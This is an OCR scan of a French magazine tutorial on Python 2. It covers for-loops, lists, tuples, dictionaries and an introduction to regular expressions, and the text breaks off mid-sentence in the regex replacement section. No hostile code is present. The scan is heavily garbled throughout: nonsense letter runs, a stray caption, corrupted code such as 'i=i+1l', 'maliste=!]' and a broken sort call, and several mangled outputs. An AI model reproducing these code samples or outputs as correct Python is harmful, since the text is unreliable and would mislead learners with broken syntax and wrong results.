nombre d'instructions. Les valeurs 
sont données explicitement dans 


üne liste où une chaîne... | 
On peut par exemple mettre les 


valeurs de cet indice dans une liste, 
et pour chaque nombre de la liste, 


on répétera. l'instruction. 
| | Exemple : te 


#1 / usr/ bin/ python 


‘liste SE 


[ 'pierre', 'paul','jacques] 


1i=0 
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for prenom in liste : 

print prenomt' est 
present 

i=i+1l 
print ‘Il y a ‘,i,' personnes 
présentes. ' 


Ici on obtiendrait par exemple l'af- 
fichage : 

pierre est présent 

paul est présent 

jacques est présent 

Il y a 3 personnes présentes. 


La boucle « for » balaye donc une 
liste d'éléments contenus dans la 
liste et réalise l'instruction conte- 
nue dans son bloc pour chaque 
valeur de la variable « prenom ». 
La boucle est terminée à la fin de la 
liste. Attention, si la liste doit être 
modifiée dans le bloc d'instruc- 
tions, il est recommandé de travail- 
ler sur une copie de la liste. 

On n'utilise pas forcément une 
liste, on peut utiliser une chaîne de 


caractères par exemple, ou utiliser 
une fonction... voici un autre exem- 
ple : 
#1 /usr/bin/python 
for i in range(5) : 

print ‘Le nombre 
est',i 


Ici la variable i varie entre 0 et 4 
compris, c'est l'équivalent d'une 
boucle for(i=0;i<5;i++) en C par 
exemple. 


Sortir des boucles 

Il existe comme en C, la com- 
mande « break », qui permet de 
sortir de la plus petite boucle « for 
» ou « While » englobante. 

A l'inverse, l'instruction « continue 
» continue sur la prochaine itéra- 
tion de la boucle. 

On utilise une clause « else » dans 
les boucles pour exécuter une 
série d'instructions une fois que la 
boucle est terminée (la liste est 
terminée pour le for, la condition 


est devenue fausse pour le while...). 
L'instruction « break » permet de 
ne pas exécuter ce « else ». On 
sort de cette boucle englobante. 
L'instruction « pass » permet 
quant à elle de ne rien faire du tout. 
Elle peut être utile s'il est utile syn- 
taxiquement de mettre une ins- 
truction, sans pour autant exécuter 
une action. Par exemple : 

while 1: 


pass # ne fait rien 


Vous voilà maintenant aptes à faire 
des programmes un peu plus évo- 
lués qui exécuteront des actions 
selon des conditions. Vous allez 
maintenons voir des types qui vous 
permettront par exemple de 
construire vos boucles « for »,tel- 
les que les listes dont nous avons 
citées quelques exemples dans cet 
article. 
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Le stockage et la manipulation de gros volumes de données 
deviennent vite contraignant, et les types de données de bases 
montrent leur limite. Par exemple, comment stocker:üne liste de 


dix entiers saisie par l'utilisateur ? Vous pourriez Sans doute 
déclarer dix variables et effectuer séquentiellement leur affecta- 


' LILI TEITIE 


tion. Mais n'est-ce-pas laborieux ? Et surtout pensiez-vous utiliser 
la même parade si vous étiez amené à gérer 10 000 valeurs ? st 


Introduction 


Comme la plupart des langages de programmiätion, 
Python propose des types de données plus} com- 
plexes, qui vous simplifient la vie, mais aussi dés fonc- 
tions de manipulation associées pour effectuer des 
recherche d'occurrence(s), ..) äinsi que d' 
pointues, comme les tris. 4H 


pit 


LITTLE LTE 


'e. . . 4 À 
L Ii t Feite AAA 
4 : ETET INT ET PENTEETINLIET 
sS es Fret : TELITETENETTRITTII TEEN 
es Î Fat | FTTERITÉ MUienks2t280t | 
re L LERPAEIMETEU 
: me . ! "2 : L 


C'est la structure la plus Simple. Ellé'ést éga- 


lement appelée vecteur ou tableau! À l'inverse des 
types de données de bases, les strüétures de données 
doivent être déclarées avant d'être Utilisées. Ainsi, il 
faut procéder ainsi pour initialisef/une nouvelle liste 
vide : HT 

GUFANHE 
maliste=!] 
Notez que, comme en C;lé$ crochets dési- 
gnent le tableau. L'analogie ne s'arrête pas là, puisque 
l'accès et l'affectation sont également possibles de la 
même façon. De plus, Python étant programmé en C, 
il existe de nombreuses similitudés!entre les deux lan- 


gages. HER 


Pour construire une listé pré-femplie, il suffit 


4 . 
autres plus. 
sat ATEN } : 
POESIE PANETTIERE ETF MassnrtahrA plate tue) LEE] 
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de donner l'ensemble des valeurs souhaitées : 
maliste2=[3,1,9,5,3] WU 


Magiéide Python; vous souhaitez la liste des 


100premiers nombres, soit de 0 à 99: 
tâches courantes (ajout en téterétren finite, jets finesse HOPHSE 


: 12 


| | maliste3=range(0,100) 


LA "| 
Fete 
12 


Pour. afficher lé contenu-dé la liste, saisissez 


le mot print suivi du nom associé 2 


print maliste 


print maliste2 


L'interpréteur vous renvoie alors d'abord [], 
puis [3, 1,9, 5, 3]. 


Ajoutons maintenant des valeurs à notre 
liste. Pour ce faire, appelons une méthode de manipu- 
lation des listes : append(). En effet, les listes, et globa- 
lement les structures traitées ici, sont des instances 
de classes, sur lesquelles nous reviendrons plus tard 
dans ce manuel. Vous comprendrez alors pourquoi il 
faut les déclarer. 


Les méthodes permettent d'agir sur les pro- 
priétés d'une instance. Elles s'appellent en appliquant 
sur cette dernière l'opérateur « . ». 
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Pour ajouter une valeur en fin de liste, il faut 
utiliser la méthode append(). Par exemple, pour ajou- 
ter 8 : 


maliste2.append(8) 


maliste2 devient alors : [3, 1, 9, 5, 3, 8]. Vous 
constatez que la capacité du tableau a automatique- 
ment été augmentée de |. 


Nous souhaitons maintenant récupérer cette 
valeur. Deux possibilités : l'utilisation des crochets ou 
l'utilisation de la méthode __ getitem__(). Dans ces 
deux cas, vous devez connaître l'indice (l'index) de la 
valeur à récupérer dans le vecteur. 


Point important : la numérotation des indices 
commence à 0. Pour accéder à l'énième élément, il 
faudra indiquer l'index (n-1). Ainsi, pour récupérer la 
première valeur : 


maliste2.__ getitem_ (0) 
maliste2[0] 


Python introduit une subtilité dans l'indexa- 
tion des valeurs qui rend de nombreux services : les 
indices négatifs. L'indice -| correspond à la dernière 
case du tableau, -2 à l'avant dernière, etc. Ceci est 
très utile car l'accès direct au dernier élément est 
constamment disponible. 


Depuis le début, nous n'insérons que des 
entiers mais sachez que nous aurions tout à fait le 
droit d'ajouter d'autres types de données comme la 
chaîne de caractères « Python » : 


maliste2.append(« Python ») 


L'affichage de maliste2 renvoie alors [3, 1, 9, 
5, 3, 8, Python]. Je vois déjà les les cheveux des habi- 
tués du C se dresser. La création d'un tel tableau 
d'éléments de types hétérogènes est rendu possible 
par la grande faiblesse du typage des données du lan- 
gage. Cependant, c'est à vous d'opérer les vérifica- 
tions nécessaires avant de manipuler les données pré- 
sentes. Essayez donc ceci : maliste2[-1]=maliste2[- 
1]+2. Absurde n'est-ce-pas ? Pourquoi voudrais-je 
ajouter 10, arithmétiquement parlant, à « Python » ? 
Pourtant ce type d'erreur non intentionnelle est clas- 
sique, car le programmeur ne pense pas toujours que 
le cas peut se produire. 


L'utilisation la plus fréquente est la représen- 


tation de tableaux multidimensionnels : 


tableau_2d=[] 

tableau_2d.append([« Colonne A 
Colonne B : x au carré »]) 

tableau _2d.append([1,1]) 

tableau_2d.append([2,4]) 

tableau_2d.append([3,9]) 


: X }, « 


Ce tableau est un vecteur à 2 colonnes, 4 
lignes qui contient du texte (entête des colonnes À et 
B) et des valeurs numériques représentant un court 
échantillon de nombres élevés au carré. 


Maintenant, que nous savons construire des 
tableaux et modifier leurs valeurs, traitons ces derniè- 
res : leur tri et leur dénombrement. 


Partons de l'exemple : 


>>> tab=[1,2,10,9,2,35,24,32,17,28] 
>>> print len(tab) 


Le tableau  [1,2,10,9,2,35,24,32,17,28] 
contient 10 valeurs. Nous pouvons obtenir cette 
information via l'appel à une fonction générique de 
Python, len() (de l'anglais length, longueur). Elle ren- 
voie la taille de l'objet passé en paramètre. Dans le cas 
d'une liste, c'est le nombre de cases qu'elle contient. 
Attention, dans le cas de tableaux multidimensionnels, 
vous n'obtiendrez que le nombre de cases de la pre- 
mière dimension. 


Reprenons l'exemple tableau_2d, 


>>> print tableau_2d 

[['Colonne À : x’, "Colonne B : x au carré'], [I, 
1], [2, 4], [3, 911 

>>> print len(tableau_2d) 


Voici comment accéder aux sous-tableaux, 


>>> print tableau_2d[0] 
['Colonne A : x’, "Colonne B : x au carré'] 
>>> print len(tableau_2d[0]) 


L'existence de cette fonction ne relève pas 
exclusivement des listes. En effet, par exemple, elle est 
également utile pour obtenir le nombre de caractères 
dans une chaîne : 





>>> msg= « Python » 
>>> print len(msg) 


Il est fastidieux d'effectuer manuellement la 
concaténation de deux listes : déclaration d'un nou- 
veau vecteur, copie des valeurs de la première, et 
enfin copie des valeurs de la seconde. L'opération a 
été simplifiée avec l'opérateur + : 


>>> tab2=[1,2,10,9,2,35]+[24,32,17,28] 
>>> print tab2 
[1, 2, 10, 9, 2, 35, 24, 32, 17, 28] 


Autre fonction parfois utile, l'inversion d'une 
liste. Elle s'effectue via la méthode reverse(). Ainsi, la 
première case va devenir la dernière et la dernière la 
première, la seconde va être échangée avec l'avant 
dernière, etc... 


>>> tab2.reverse() 
>>> print tab2 
[28, 17, 32, 24, 35, 2,9, 10,2, 1] 


Rien de bien compliqué ! Nous allons main- 


tenant trier ce tableau. Là encore, c'est un jeu d'en-f|| 


fant : rien à la main, pas de parcourt ni de tableau tem: 
poraire. Un simple appel : sort(). 


>>> tab2.sort() ‘a 
>>> print tab2 | 
[1, 2,2, 9, 10, 17, 24, 28, 32, 35] 


Des tableaux très longs:sont ainsi:facilement |! 
triés, par défaut dans l'ordre croissant, Mais Vous sou- | 
haitiez peut-être un tri dans l'ordre: décroissant HAN 


Préférez alors cette appel compie à à à 


>>> tab2.sort(reverse= h: 
[35, 32, 28, 24, 17, 10,9, 2,2, 1 


Cela aurait pu se faire par. ds appels succes- 
sifs à sort() puis à reverse(), mais là possibilité de le 
faire en une fois supprime du code!Il est en effet inu- 
tile d'inverser car les algorithmes! de tri fonctionnent 
aussi bien dans un sens, que dans l'autre. 


Passons maintenant à la D erche d'occu- 
rence(s). Pour savoir si une valeur est présente dans 
une liste, il faut appeler contains(), en lui donnant en 
paramètre l'objet à trouver, et qui renvoie alors un 
booléen : Ai 


>>> tab2.__contains_ (4) … 





False 
>>> tab2. 
True 


contains__ (2) 


Pour obtenir le nombre de fois qu'une valeur 
est présente, c'est la méthode count(). Par exemple, 
pour récupérer le nombre d'occurrence de 2 dans 
tab? : 


>>> tab2.count(2) 


Nous savons donc qu'il existe 2 occurrences 
de « 2 » dans notre tableau. Cas classique : je sou- 
haite récupérer leur index. Malheureusement il 
n'existe pas de méthode toute faîte qui renvoie; par 
exemple, un vecteur contenant une telle.iste: Nous 
ne disposons que d'une fonction quiifenVoie l'indice 
de la première occurrence de:l'objet passé en para-:, 


mètre : index(). Cependansis à ce stade loperatlo est AIRE 


déjà réalisable. 


Ava de: vous Monet une sb jé sut D 


introduire un nouvel ‘opérateur : ‘tableau[X: Y]. Il per: rie 
met d'obtenir un Sous-Vécteur, à pañtir du vecteur @ 
tableau », qui contient les valeurs se Fndiee 2 à En HÉRMAUE 


dice Ÿ non compris : RAR EMA PERRET St 
FH RAE TA 
>>> print tab2 GRRRRnNNInEens 
[1,,2:10,9, 2,35,24, 32 17, 28) Sat 
>>> print a 6] “ét ja 
| [? 2, ot ARRETE 


| “Une eo pour che une liste..des : 
index des PECUrFANCES de 2 dans le vecteur r tab? : 
ne dc rableau a) Me 
Aer feel * | 


# Éathardhe du ETS d'occurrences de 2 
>>> nb_occur = tab2.count(2) 


#initialisation d'un pointeur sur la première 
case du tableau 
>>> pointeur = Q 


>>> while nb_occur > 0 : #tant qu'il y a des 

2 

tab_tmp=tab2[pointeur:len(tab2)] 
#construction d'un sous-vecteur entre l'indice cou- 
rant et la fin de tab2 

tmp_index=tab tmp.index(2) 
#récupération de l'index de la première occurrence 

resultat.append(tmp_index+poin,g 4 
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teur) #ajout de l'index au tableau des indices, prise en 
compte du décalage en ajoutant pointeur 

pointeur=pointeur+tmp_index+ | 
#on déplace notre pointeur au delà de l'occurrence 
trouvée 


nb_occur=nb occur-l #une occur- 
rence de moins à trouver 


>>> print resultat 


[1, 4] 
Explication : 


Je vais construire une liste qui contiendra les 
index des occurrences trouvées. Je créé donc une 
liste vide, que j'ai nommé resultat. Si toute les valeurs 
sont concentrée en début de tableau, il est inutile de 
le parcourir intégralement. Je récupère donc le nom- 
bre d'occurrences présentes dans nb_occur. J'initialise 
ensuite une variable de parcourt, pointeur, sur l'index 
de la première case : 0. 


Voilà, il n'y à plus qu'à itérer sur le tableau 
tant qu'il reste des occurrences à trouver. Je construis 
alors un sous-vecteur à partir de tab2, de l'indice 
pointeur à sa fin. Je cherche alors ensuite l'index de la 
première occurrence.Attention cet index est celui du 
sous-vecteur. || faut donc ajouter la valeur de pointeur 
pour retrouver l'index correspondant au vecteur ori- 
ginel. J'ajoute alors la valeur à la liste resultat, puis je 
déplace pointeur pour ne pas retraiter la même 
occurrence à la prochaine itération. 


Désormais, nous souhaitons supprimer les 
doublons. Nous pourrions reprendre l'algorithme 
précédent, et pour chaque occurrence en double, la 
remplacer, par exemple, par du vide où un autre nom- 
bre. Cependant, quelle valeur prendre ? Vous allez 
devoir de plus prendre en compte le fait qu'il existe 
des cases libres dans vos algorithmes. Enfin, la 
mémoire associée n'est pas libérée. Sur quelques 
cases, ce n'est pas critique, mais pas très propre en 
termes de programmation. Maintenant, à grande 
échelle, après plusieurs milliers de suppressions, le 
problème se posera nécessairement. 


Pour retirer proprement une valeur, on uti- 
lise la méthode remove(), qui supprime la’ première 
occurrence de l'objet passé en paramètre : 


>>> print tab2 
[1,2, 10,9, 2,35, 24, 32, 17, 28] 
>>> tab2.remove(2) 





>>> print tab2 
[1, 10,9, 2,35, 24, 32, 17, 28] 


Ou bien del() qui enlève la case indiquée : 


>>> print tab2 

[1,2, 10, 9, 2, 35, 24, 32, 17, 28] 
>>> del(tab2[1]) 

>>> print tab2 
11:1092;35;24;32;17;281 


Dans des conditions de production, un 
tableau trié par ordre croissant peut atteindre des 
milliers de cases. L'ordre à l'intérieur de ce vecteur 
est primordial. Donc, si j'ajoute une valeur avec 
append(), je devrais nécessairement faire appel à 
sort() juste après pour réorganiser mon tableau. 
Petite astuce d'optimisation : sachant que le tableau 
est trié par ordre croissant, pourquoi ne pas insérer 
directement la valeur au bon endroit, et économiser 
ainsi un précieux temps de calcul en évitant de retrier 
intégralement le vecteur ? Python vous offre une par- 
tie de la solution par la méthode insert(index, objet) 
qui insère juste à la position index l'objet passé en 
paramètre : 


>>> tab2.insert(0,99) 
>>> print tab2 
(122,1410;92,35/24/32, 17:28] 


Pour réaliser l'insertion de 5 dans le tableau 
[0,1,2,3,4,6,8], nous n'avons plus qu'à trouver la bonne 
position : 


>> tab3=[0,1,2,3,4,6,8] 

>> j=0 

>> t=len(tab3) 

>> while (i<t) and (tab3[i]<5) : #on prend 
garde de ne pas sortir du tableau 

i=it| #incrémentation tant que la 

position n'est pas trouvée 

>> tab3.insert(i,5) 

>> print tab3 

[0, 1,2, 3, 4,5, 6,8] 


Notion d'itérateur : 


Le parcours d'une liste est relativement fasti- 
dieux :initialisation d'une variable, itération avec accès : 
par les crochets et incrémentation de la variable. 
Comme d'autres langages, Python propose les itéra- 
teurs, qui simplifie les traitements. 


Je veux par exemple afficher toutes les 





valeurs paires de la liste : 


>>> for t in tab3 : 
if tX2== 
print t 
Même chose, mais dans l'ordre décroissant : 


>>> for t in tab3. 
if t22== 
print t 


___reversed__ {() : 


Dernière chose à propos des listes, si vous 
comptez utiliser votre liste comme une pile LIFO 
(dernier arrivé, premier servi), inutile de redévelop- 
per la méthode pop() qui retire et retourne le pre- 
mier élément en une seule opération : 


>> print tab3 

[0, 1,2, 3, 4,5,6,8] 
>> print tab3.pop() 
0 


>> print tab3 
[1, 2, 3, 4, 5, 6,8] 


Les tuples 


Les tuples sont des listes particulières; Ils 
sont plus légers en terme de ressources mais ils ne 
permettent ni l'insertion, ni la modification d'élé- 
ments. Ils sont dit immuables car leur taille’et leurs 
éléments sont fixés à leur initialisation. Leur ütilisation 


se restreint habituellement au passage dewvaleurs a Le 


fonctions qui ne les modifient RE. 


La déclaration d'un tuplé est différente de |... 
celle d'un vecteur, mais l'opérateur d'accès CU Qi FRE 


valeurs est identique : 


>> a=(1,2,3) 
>> print a[|] 


>> print a[l:2] 
(2,3) 


Les tuples ayant un intérêt assez limité, pas- 
sons à plus intéressant : les dictionnaires. 


Les dictionnaires 


Les dictionnaires sont, ce qu'on appelle dans 
d'autres langages, des tableaux associatifs. Dans des 
tableaux conventionnels, nous associons une valeur à 
un index. lci, c'est une valeur à une clef, représentée 
par une chaîne de caractères. L'initialisätion s'effectue 


par la déclaration d'une liste de clefs et de valeurs 
associées, séparées par le symbole deux-points. Par 
exemple, construisons le dictionnaire des mois de 
l'année avec le numéro qui leur correspond : 


>>> mois={'Janvier" : |, ‘Février 
3,'Avril' 
4,'Maï':5;'Juin':6;'Juillet':7,'Août':8,'Septembre':9, Nove 


mbre':10, Décembre':1 1} 


:2, Mars’ : 


Définir un dictionnaire vide, se fait de 
manière analogue aux listes, mais avec les accolades : 


>>> vide={} 


Pour accéder à une valeur,.ilffaut utiliser. le 


construction RACE Ici, pour obtenir’ le 


numéro du mois d'août : 


>>> print mois['août'] 


- B:}: 


| L affectatidfis où MHÉsdeioh kde noubellet 
Valeurs sont identiques. En effet, Python interprète la 


tentative de mise à jour d'une clefinexistante Comme 


un ajout. Vous l'avez peut êtré constaté, deux erreurs 1} 


sont présentes dans la déclaration des mois :le moïs 
d'octobre n'est pas présent, et par conséquent, ily a 
un cÉcARES dans la numérotation. 1 


4 ll, fu JETHE 


rit 1H? th 
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fectation et d'insertion de valeurs : 


>>> mois['Novembre‘]= | | 
>>> mois[ Décembre’ 1512 
>>> mois[' Octobre']=10 
1 >>> print mois 
Avril t 4 Novembre’: | 1, 'Février': 2, Juillet 
7, ‘Octobre’: 10, 'Janvier': |, ‘Juin’: 6, Décembre’: 12, 
Mars": 3, 'Maï: 5, Août: 8, Septembre": 9} 


Vous souhaitez peut être associer plus d'une 
valeur à une clef. Pensez qu'une valeur peut être de 
n'importe quel type de données. Vous pouvez alors 
créer un dictionnaire de listes, une liste de dictionnai- 
res où un dictionnaire de dictionnaires, selon vos 
besoins. 


Supposons maintenant que je souhaite insé- 
rer une nouvelle valeur mais, si la clef existe déjà, j'ai- 
merai afficher la valeur associée avant de l'écraser. Je 
vais utiliser les méthodes has_key() et get() qui per- 
mettent respectivement de vérifier la présence d'une 
clef et de récupérer la valeur associée à celle-ci : 
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>>> cotations={'Or" : 2, 'Argent' : 1.5} 
>>> print « Nombre de cotes à saisir : » 
>>> nb=input() 
>>> While nb > 0: à 

print « Nom : » 

clef=raw_input() 

print « Cote : » 

cote=input() 

if cotations.has_key(clef) : 

print « Ancienne valeur 

», cotations.get(clef) 

print « Nouvelle cote »,clef,« : », 


de », clef, « : 


cote 
cotations[clef]=cotations 
nb=nb-| 


Explication : ceci est un début de programme 
de gestion de cotes associées à des éléments physi- 
ques. Le dictionnaire de base est constitué de deux 
éléments, 'Or' et 'Argent'.Au lancement, le nombre de 
cotes est demandé pour initialiser une boucle. 
L'utilisateur est ensuite invité à saisir un nom (la clef) 
et la cote (la valeur). L'algorithme vérifie ensuite si la 
clef saisie n'est pas déjà présente avec has _key(). Si 
c'est le cas, l'ancienne valeur est obtenue par get(),. 
puis affichée. Le dictionnaire est ensuite mis à jour et 
la boucle se poursuit, ou se termine. 


Pour supprimer une valeur du dictionnaire, il 
faut utiliser la fonction del() : 


>>> Cotations 

{'Or': 2, 'Argent': 1.5} 

>>> del cotations['Argent] 
>>> print cotations 

{'Or': 2} 


Vous pouvez également vider intégralement 
le dictionnaire via la méthode clear() : 


?>> cotations 

{'Or": 2, 'Argent': 1.5} 
>>> cotations.clear() 
>??? print cotations 


Ü 


Il existe ensuite des méthodes pour récupé- 
rer toute où une partie du dictionnaire. Pour obtenir 
un tableaux de tuples (clef,valeur) : 


>>> cotations.items() 
[Or 2), (Argent, 1.5) 


keys() renvoie un vecteur contenant les clefs 


>>> cotations.keys() 
* _ ['Or','Argent] 


Et son complémentaire, values(), une liste des 
valeurs : 


>>> cotations.values() 
[2, 1.5] 


Les itérateurs sur les dictionnaires : 


Il existe trois types d'itérateurs sur les dic- 
tionnaires. Vous pouvez en effet parcourir les clés, les 
valeurs ou les deux à la fois. Attention, les dictionnai- 
res n'intègrent pas de notion d'ordre compréhensible 
par l'homme : les éléments sont classés de telle 
manière à optimiser les manipulations de données et 
leur accès. 


>>> for t in cotations.iterkeys() : 
print t 

Or 

Argent 


>>> for t in cotations.itervalues() : 
print t 

2 

1.5 


>>> for tin cotations.iteritems() : 
print t 

(Or, 2) 

(Argent', |.5) 


Conclusion 


Voilà, vous possédez tout l'outillage nécessaire pour 
bien débuter en Python : un interpréteur, des structu- 
res de contrôles et des structures de stockage d'in- 
formation. Il existe bien évidemment d'autres choses 
à connaître sur les types de données que sont les lis- 
tes, les tuples et les dictionnaires. Le sujet est vaste, 
toujours en évolution, pour améliorer les performan- 
ces. N'hésitez pas à consulter l'aide en ligne de 
Python : help (list), help(tuple) ou help (dict). Vous 
découvrirez des notions qui n'ont pas été abordé et 
c'est un très bon mémento... 

DAVID PUCHE -SNAKE- 
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Introduction aux 
expressions régulières 
Une expression régulière, ou regex 
(pour Regular Expressions) est une 
description symbolique d'une 
chaîne de caractères. Par exemple, 
on pourra penser à l'ADN : le 
représenter par l'écriture ressem- 
blerait à une suite de A, de G, deT 
et de C (pour représenter les bases 
azotées que sont l'Adénine, la 
Guanine, la Thymine et la Cytosine). 
Ainsi, pour vérifier qu'une chaîne de 
caractère correspond à la descrip- 
tion d'un brin d'ADN, il faut que la 
chaîne vérifie la proposition « cha- 
que caractère de cette chaine 
appartient exclusivement au groupe 
composé des lettres A,C,G,T ». 
C'est un exemple très simple d'ex- 
pression régulière. 

En « regexologie », on utilise des 
termes précis pour définir qui est 
quoi. On parle d'abord de chaîne de 
caractères, ce qui se passe de com- 
mentaires, sinon celui que de se rap- 
peler qu'une chaîne de caractère 
peut être une suite de chiffre, ou 
une chaîne contenant uniquement 
des symboles — ceci pour préciser 
que le mot « caractère » englobe 
bien plus que les lettres de l'alpha- 
bet. Ensuite, on dira d'une chaîne de 
caractère qu'elle correspond ou 
non à une expression régulière : « 


santes pour 


ATCGCT » correspond à notre 
expression régulière «la chaîne de 
caractère ne contient que des À, des 
T, des G et des .Ü », alors que 
«ATBDKL» ne lui correspond pas. 
On peut également parler de cor- 
respondance d'une expression 
régulière à une chaîne de caractère. 
Cela s'exprime par le verbe « to 
match », en anglais. Bien sûr, le cas 
où la chaîne entière correspond à 
l'expression régulière.n'est pas tou- 
jours vrai, mais une sous-chaîne 
correspond : on parle alors de cor- 
respondance d'une partie de la 
chaîne à la regex. 


Les expressions 
régulières dans Python 


Quelle en est la syntaxe ? 
Une expression régulière, comme 
on l'a vu, est une description sym- 
bolique qui permet de recherche 
une chaîne. Voici quelques symboles 
qui permettent d'écrire une regex : 
. (un point) : pour désigner 
n'importe quel caractère (de la 


table ASCII) 


[0-91 : pour désigner un 
chiffre (0,1,2, ..) 

[a-z] : pour désigner une 
minuscule 

[A-Z] : pour désigner une 
majuscule 


Les expressions régulières sont une 
famille de notations compactes et puis- 


décrire certains 


ensembles de chaînes de caractères. 
Elles servent à parcourir de façon auto- 
matique des textes à la recherche de 
morceaux de texte ayant certaines for- 
mes, et éventuellement remplacer ces 
morceaux de texte par d'autres. 





h nn 


Chancelor koreth (star trek). 





[A-Za-z] : pour désigner 
une minuscule ou une majuscule 

R : pour désigner l'unique 
caractère R 

[1-4] : pour désigner un 
chiffre compris entre | et 4 (inclus) 

[ABCD] : pour designer 
soit À, soit B, soit C, soit D 

\ est le caractère d'échap- 
pement 
Par exemple, pour notre ADN vu 
précédemment, nous écririons que 
chaque caractère du brin d'ADN 
correspond à l'expression régulière 
"TACGT]". Notez que je parle de 
correspondance d'un caractère à 
une regex, ce qui s'explique par le 
fait qu'un caractère soit un sorte 
particulière de sous-chaïne. 
Pour dire que le brin d'ADN 
contient entre une fois et une infi- 
nité de fois l'un des caractères pré- 
cédents, nous utiliserons ce qui se 
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nomme un quantificateur, « + »,en 
l'occurence. "[ACGT]+" corres- 
pond à une suite de une ou plu- 
sieurs lettres du groupe [ACGT]. 
Cela définit donc bien notre ADN. 
On traduit le quantificateur « + » 
par l'expression « Au moins une 
fois ». 

Un autre quantificateur est le «* », 
qui ressemble au « + » a ceci près 
qu'il indique une répétition pouvant 
aller de zéro à l'infini de fois le 
groupe (ou caractère) qu'il suit. 
L'expression régulière « * » dési- 
gne donc une suite de caractère de 
la table ASCII, suite qui comporte 
de 0 à une infinité de caractère 
(«PROGRAMMEZ en PYTHON en 
2005» correspond à cette expres- 
sion régulière). On traduit le quanti- 
ficateur « * » par l'expression « 
Zéro ou plus ». 

Dernier quantificateur, plus simple : 
« ? ». Il s'agit du quantificateur qui 
indique la répétition de zéro à une 
fois de l'expression qu'il suit. Par 
exemple, [0-4]? correspond à zéro 
ou une fois un chiffre compris entre 
0 et 4 (inclus). On traduit le quanti- 
ficateur « ? » par l'expression « 
Une fois au plus ». 

Deux autres symboles importants 
sont « À » et « $ ». Ils désignent 
respectivement le début et la fin 
d'une chaïne (à ne pas confondre 
avec le début et la fin d'une phrase). 
Enfin, le caractère d'échappement 
«\ » permet d'inclure dans l'ex- 
pression régulière un caractère spé- 
cial, comme l'astérisque par exem- 
ple. Pour rechercher la présence de 
l'ensemble des réels dans un énoncé 
de mathématiques, nous utiliserons 
ainsi l'expression « R\*», puisque « 
R* » aurait correspondu a une 
recherche de zéro ou plusieurs fois 
le caractère KR. 


Le module « re »: 

En python, les manipulations d'ex- 
pressions régulières se font grâce au 
module re (regular expressions). 
Nous commencons donc par l'im- 
porter, via la commande qui doit 


maintenant vous être familière : 
import re 

Créer une expression régulière en 
Python, cela s'obtient par l'appel à 
re.compile(). On passe à cette fonc- 
tion l'expression régulière. Petite 
note au niveau de la chaîne passée : 
elle doit être au format brut, c'est à 
dire que plutôt que de l'encadrer de 
guillemets, il faudra qu'elle débute 
par « r” »,le r désignant raw (brut, 
en anglais). Ceci pour éviter que 
Python interprète le \ comme 
caractère d'échappement, et plus 
généralement, pour éviter que 
Python ne tente de traitement 
interne sur la chaîne. Il utilise donc 
la chaîne brute "telle quelle”. 

my first regex = 
re.compile(r"[ACGT]+") 

est la définition en python de notre 
expression régulière permettant de 
définir une partie de brin d'ADN 
(suite de A, C, G ouT), 


Test de présence : 

Premier cas d'utilité des regex : tes- 

ter la présence d'une expression 

correspondant à une regex dans 

une chaîne. Voici la façon de procé- 

der en Python. 

Soit PHRASE la chaîne suivante : « 

Le brin d'acide désoxyribonucléique 

extrait est composé ainsi 

GCTATCGUTAC » 

Nous allons tester la présence 

d'une chaîne de caractères corres- 

pondant a notre regex des ADN sur 

la chaine PHRASE. 

import re 

PHRASE = "Le brin d'acide 

désoxyribonucléique extrait 

est composé ainsi : GCTATCG- 

TAC" 

my first regex = 

re.compile(r"[ACGT]+") 

if 

my first regex.search(PHRASE) 
print "Une partie d'ADN à 

été trouvée" 


Après avoir créé notre regex par 
re.compile(), nous lui demandons de 








adhn. 


tester, grâce à l'appel à search(), la 
présence de chaine lui correspon- 
dant. Si tel est le cas, search() ren- 
voie un objet qui n'est pas nul, donc 
le test IF est validé et nous affichons 
un petit message. 


Récupération : 

Vient ensuite l'envie de récuperer la 
ou les chaines correspondantes à 
l'expression régulière. Prenons un 
cas simple : 

PHRASE = "Le brin d'acide désoxy- 
ribonucléique extrait est composé 
ainsi : GCTATCGTAC. Il diffère du 
brin précedemment identifié 
(AGTCTGATCCAG)" 

À vue d'œil, au moins deux corres- 
pondances à notre regex sur l'ADN 
se trouvent dans cette chaîne. Dans 
un premier temps, tâchons de récu- 
pérer la première occurrence, ce 
qui se fait ainsi : 

import re 

PHRASE = "Le brin d'acide 
désoxyribonucléique extrait 
est composé ainsi : GCTATCG- 
TAC. IL diffère du brin pré- 
cédemment identifié (AGTCT- 
GATCCAG) " 





my first regex = 
re.compile(r"[ACGT]+") 
occurence = 

my first regex.search(PHRASE) 
print occurence.group(0) 


Mais d'où vient cet appel à group() ? 
Simplement, et vous l'apprendrez si 
vous continuez dans les expressions 
régulières, il est possible avec une 
seule regex d'extraire plusieurs 
groupes. Îl s'agit d'inclure des paren- 
thèses dans la regex, et les groupes 
sont ensuite numérotés dans l'ordre 
d'apparence des parenthèses 
ouvrantes dans l'expression régu- 
lière. Présentement, nous récupe- 
rons le groupe 0, qui correspond à 
l'intégralité de la chaîne extraite 
grâce à search(). Or, search() s'arrêé- 
tant à la première correspondance 
trouvée, nous obtenons donc le 
résultat escompté. Le résultat de 
l'opération devrait être l'affichage 
de la chaîne GCTATCGUTAC. 
Pour extraire d'autres correspon- 
dances, deux méthodes existent : 
l'utilisateur d'un itérateur, ou la 
création d'une liste contenant l'en- 
semble des correspondances. Un 
article de ce manuel vous expli- 
quant ce qu'est une liste, nous opte- 
rons donc pour cette sseconde 
méthode. Voici le code : 


import re 

PHRASE = "Le brin d'acide 
désoxyribonucléique extrait 
est composé ainsi : GCTATCG- 
TAC. Il diffère du brin pré- 
cédemment identifié (AGTCT- 
GATCCAG) " 

my first regex = 
re.compile(r"[{ACGT]+"}) 
occurences = 

my first regex.findall(PHRASE) 
print "Nombre d'occurences 
trouvées 
print "La liste des occuren- 
ces est :",occurences 


",len(occurences) 


Si tout se passe bien, le script 
devrait trouver deux occurrences : 
GCTATCGTAC et AGTCTGATC- 


CAG. La dernière ligne affiche la 
liste, ce qui devrait produire un 


résultat ressemblant à « La liste 
des occurences est : ['GCTATCG- 
TAC','AGTCTGATCCAG" ». Pour 
ensuite accéder à telle ou telle 
occurence, on utilisera la syntaxe 
occurences[n] où n est le rang de 
l'occurence visée (sachant que les 
rangs commencent à 0, et non pas 
|). L'utilisation de la fonction len() 
sur la liste "occurences" nous per- 
met de connaitre le nombres d'ob- 
jets contenus dans la liste, donc le 
nombre de correspondaces trou- 
vées dans notre cas. 


Remplacement : 

Troisième cas d'utilisation d'une 
regex : remplacer toute chaîne qui 
correspond à une regex par une 
